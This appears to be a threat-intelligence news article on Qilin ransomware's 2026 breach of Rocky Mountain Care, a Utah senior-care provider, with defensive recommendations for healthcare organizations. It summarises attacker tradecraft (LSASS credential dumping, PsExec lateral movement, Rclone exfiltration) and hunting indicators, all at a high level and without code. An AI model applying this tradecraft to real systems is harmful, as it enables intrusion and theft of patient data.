Rocky Mountain Care, a Woods Cross, Utah-based provider of skilled nursing and home health services for seniors across Utah and Wyoming, has confirmed a ransomware incident in which an unauthorized third party accessed files on its network between January 30 and February 2, 2026. The Qilin ransomware group claimed responsibility by listing the organization on its dark web leak site on February 23, 2026. The provider disclosed the breach publicly on March 27, 2026.

What Happened

According to Rocky Mountain Care's official breach notice dated March 27, 2026, an unauthorized third party gained access to certain files on the organization's network over a four-day window spanning January 30 to February 2, 2026. The intrusion was not publicly acknowledged until Qilin operators posted Rocky Mountain Care to their dark web data leak site on February 23, issuing a ransom demand and threatening to publish exfiltrated data if payment was refused.

Rocky Mountain Care engaged third-party forensic specialists to investigate the scope of the compromise and secure its environment. The organization has not disclosed whether a ransom was paid, nor has it confirmed the volume of data exfiltrated. A review of affected data is ongoing to determine whether protected health information (PHI) is involved, and the company has committed to direct notification of affected individuals once that analysis concludes.

What Was Taken

The full contents and volume of stolen data have not been disclosed. Rocky Mountain Care has stated that certain files were "viewed or taken without authorization" during the intrusion window, but the data review remains in progress. Given the organization's role as a skilled nursing and home health provider for elderly patients, the likely categories of exposure include:

• Patient PHI: medical records, treatment histories, diagnoses, medications
• Personal identifiers: names, dates of birth, Social Security numbers, addresses
• Insurance and billing data: Medicare/Medicaid numbers, claims information
• Employee HR and payroll records
• Potentially financial account information for patients and staff

For comparative scale, Qilin's May 2025 attack on New England-based Covenant Health involved approximately 852 GB of data across 1.35 million files, ultimately impacting roughly 478,000 patients.

Why It Matters

Rocky Mountain Care serves a population that is uniquely vulnerable to identity theft, financial fraud, and medical exploitation. Senior care patients frequently possess clean credit histories, stable Medicare coverage, and reduced capacity to monitor their own accounts, making their stolen identity data especially valuable on criminal markets.

The incident reinforces Qilin's aggressive posture against U.S. healthcare providers. The group has emerged as one of the most prolific ransomware-as-a-service (RaaS) operations targeting the sector in 2025 and 2026, with a consistent pattern of double extortion against hospitals, long-term care facilities, and elder care networks. For defenders across the healthcare vertical, Qilin's operational tempo and sector focus should be treated as an active, ongoing threat rather than a one-off concern.

The Attack Technique

Rocky Mountain Care has not publicly disclosed the initial access vector, payload family variant, or tactics used during the four-day intrusion window. However, Qilin affiliates have historically relied on a consistent set of techniques observed across prior healthcare engagements:

• Initial access via phishing, stolen VPN credentials, or exploitation of unpatched edge devices (Fortinet, Citrix, Ivanti)
• Use of legitimate administrative tools (PsExec, AnyDesk, RDP) for lateral movement
• Credential harvesting via Mimikatz and LSASS dumping
• Data staging and exfiltration via Rclone, MEGA, or attacker-controlled infrastructure prior to encryption
• Deployment of the Qilin (Agenda) ransomware payload, typically written in Rust or Go for cross-platform impact

The compressed dwell time of roughly four days is consistent with Qilin's recent "smash and grab" approach, prioritizing rapid exfiltration over prolonged reconnaissance.

What Organizations Should Do

Healthcare organizations, particularly those in long-term and senior care, should treat this incident as a prompt to validate controls against Qilin tradecraft:

1. Audit external-facing infrastructure. Patch and harden VPN concentrators, remote access gateways, and any edge appliances. Enforce MFA on every remote access pathway without exception.
2. Hunt for known Qilin indicators. Search for anomalous use of Rclone, MEGA uploads, PsExec execution, and scheduled tasks creating persistence. Review EDR telemetry for LSASS access attempts.
3. Segment clinical and administrative networks. Ensure EHR systems, backup infrastructure, and domain controllers are isolated from general workstation traffic to limit lateral movement.
4. Validate offline, immutable backups. Test restore procedures regularly and ensure at least one backup copy is air-gapped or otherwise unreachable from production credentials.
5. Rehearse breach notification workflows. Confirm legal, communications, and HIPAA notification processes are ready to execute within required timelines should an incident occur.
6. Monitor Qilin's leak site. Track the group's dark web infrastructure for early indicators that a partner, vendor, or peer organization has been compromised, enabling faster third-party risk response.

Sources: Rocky Mountain Care discloses ransomware attack, Qilin claims responsibility